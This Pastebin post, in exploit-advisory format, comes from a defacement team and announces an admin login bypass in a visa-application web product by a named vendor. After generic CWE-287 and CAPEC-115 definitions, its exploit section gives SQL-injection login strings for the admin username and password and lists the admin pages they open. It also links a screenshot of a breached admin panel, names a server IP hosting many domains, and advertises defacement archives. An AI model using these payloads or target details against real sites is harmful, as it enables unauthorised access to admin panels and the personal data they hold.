Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Great Web Solutions Pvt Ltd Improper Authentication
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 08 May 2020
- # Vendor Homepage : agreatwebsolutions.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-287 [ Improper Authentication ]
- CAPEC-115: Authentication Bypass
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
- # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
- zone-h.org/archive/notifier=CyBeRiZM
- # Mirror-H : mirror-h.org/search/hacker/948/
- mirror-h.org/search/hacker/94/
- mirror-h.org/search/hacker/1826/
- # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
- defacer.id/archive/team/Cyberizm-Org
- # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
- # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
- aljyyosh.org/hacker.php?id=Cyberizm.Org
- aljyyosh.org/hacker.php?id=Cyberizm
- # Zone-D : zone-d.org/attacker/id/69
- # Pastebin : pastebin.com/u/KingSkrupellos
- # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
- ####################################################################
- # Impact :
- ***********
- CWE-287 [ Improper Authentication ]
- Authentication is any process by which a system verifies the identity of a user who wishes
- to access it.When an actor claims to have a given identity, the software does not
- prove or insufficiently proves that the claim is correct. Improper authentication
- occurs when an application improperly verifies the identity of a user.
- A software incorrectly validates user's login information and as a result, an attacker can
- gain certain privileges within the application or disclose sensitive information that allows
- them to access sensitive data and provoke arbitrary code execution.
- The weakness is introduced during Architecture and Design, Implementation stages.
- CAPEC-115 [ Authentication Bypass ]
- An attacker gains access to application, service, or device with the privileges
- of an authorized or privileged user by evading or circumventing an authentication mechanism.
- The attacker is therefore able to access protected data without authentication ever having taken place.
- This refers to an attacker gaining access equivalent to an authenticated user without ever going
- through an authentication procedure. This is usually the result of the attacker using an unexpected
- access procedure that does not go through the proper checkpoints where authentication should occur.
- For example, a web site might assume that all users will click through a given link in order to get to
- secure material and simply authenticate everyone that clicks the link. However, an attacker might be
- able to reach secured web content by explicitly entering the path to the content rather than clicking
- through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
- other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
- faking authentication by exploiting flaws or by stealing credentials from legitimate users.
- ####################################################################
- # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
- ******************************************************************************
- Administrator Username : '=''or'
- Administrator Password : '=''or'
- anything' OR 'x'='x
- anything' OR 'x'='x
- /admin/home.php
- /admin/visa_entry_form.php
- /admin/visa_form.php
- /admin/manage_visa_form.php
- /admin/manage_visa.php
- /admin/manage_feedback.php
- /admin/change_password.php
- ScreenShot Administrator Control Panel =>
- https://www.upload.ee/image/11652317/greatwebsolutionsadminpanelscreenshot08052020.png
- Reverse IP results for (111.118.215.27)
- There are 1,820 domains hosted on this server.
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment